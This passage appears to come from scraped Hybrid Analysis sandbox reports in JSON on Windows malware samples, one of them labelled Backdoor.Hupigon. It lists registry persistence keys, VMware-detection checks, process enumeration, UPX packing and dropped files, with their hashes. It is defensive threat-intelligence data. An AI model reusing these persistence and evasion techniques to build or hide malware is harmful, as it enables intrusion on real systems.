\"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\version.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\VERSION.DLL\"\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" trying to touch file \"C:\\Windows\\System32\\version.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"0EF6035D43E3634119DA28FCEE41653D5F7B1872F36B4D2C8D6737E2E2CD4E1E\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CONNECT\"; Key: \"VALUENAME\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"DLLLOAD16\"; Value: \"\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"DLLLOAD16\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100770000000053de23770f10e00400000000000000000050fd7f0050fd7f000000000000000000000000000000005d0df576000000000000000000000000d0f012000000000000000000c2a2297700000000e7d823777310e004000000005711400018f91200000000008000000098f91200 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100009f1872754f10e00400000000e0c223770050fd7f9311e0047cee12000000000078ff1200bd067475eb5c8071feffffff7cbd727502df2377ffffffff000000000000000020df400040f11200000000000000000048f112004cf11200e3084100000000000000000020df400040f11200 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"IsWow64Process\" with parameter \"5952\" - (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000ff2b58779bb67d77b8f01200ac01190000001900000000000000000015009300f70000000000000000000000000000000000000016008e00f7000000000000000000000008701900000000001e0000000000000000000000984a1b00f86c1900186e190080431c00c0711900000000005cef12000000000094f0120095e154776b453700feffffffff2b58779a2a5877b8f01200e8fe1200e0f01200340000c02cf01200e7385877ec38587757a97d77340000c0e0f01200e8fe120004f0120000000000a0f0120095e154770b413700feffffffec385877 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001b0000000000070000070000000048ca1b00a00f1c00d8c71b00380000000000190000000200f0c91b0070f012000464587738011900e06358770ba97d770000000000001900f8c91b000000190000000001f0ee12000000000084f0120095e15477a00f1c0050011900435c587700001900240000000300010008000000b8ee1200000000000400010004000000ccee120000000000e73858770300000067a97d77110000004200000044f112004c3f00731100000090f0120088551c000b413700feffffffec3858777c0119000000000050011900b430420000000000f8c91b00 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000003b0000002300000023000000000000000000000040f11200000000000000000020df400000000000586c57771b00000000020000f0ff5a01230000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-188", "relevance": 5, "name": "Calls APIs used for Remove Service", "description": "Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: 0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" claims program is from Thu Jan 1 15:30:08 1970", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e\" has section name UPX0 with entropy \"6.33637327379\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005952)\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CONNECT\"; Key: \"FILENAME\"; Value: \"chkserv.exe\")\n \"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CONNECT\"; Key: \"VALUENAME\"; Value: \"DLLLoad16\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "registry-56", "type": 3, "relevance": 5, "name": "Reads the registry for VMWare specific artifacts", "description": "\"0ef6035d43e3634119da28fcee41653d5f7b1872f36b4d2c8d6737e2e2cd4e1e.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3
https://hybrid-analysis.com/sample/29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3
Hybrid Analysis - Killers
{"size": 188423, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3", "sha256": "29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3", "av_detect": 87, "vx_family": "Backdoor.Hupigon", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 12, "total_signatures": 243, "extracted_files": [{"name": "suchost.exe", "file_path": "%WINDIR%\\System32\\drivers\\suchost.exe", "file_size": 188423, "sha256": "29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "29c57dbee1bb2abb438364a7382082018120eed8212e66a5fa6dc67a2e2d8ae3.exe (PID: 3536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\$Recycle.Bin\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "setup.exe", "file_path": "C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe", "file_size": 1289115, "sha256": "abcef18db6e3206982f2002e7f3527b0936f0526164c195452eb731da807a710", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "suchost.exe (PID: 2084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Desktop_.ini", "file_path": "C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Desktop_.ini", "file_size": 9, "sha256": "37ab44203e6fe1bad807bdaa52f78d7ac9e78c6eee3528a063cec4982da3a32d", "type_tags": ["text"], "description": "ASCII text, with no line terminators", 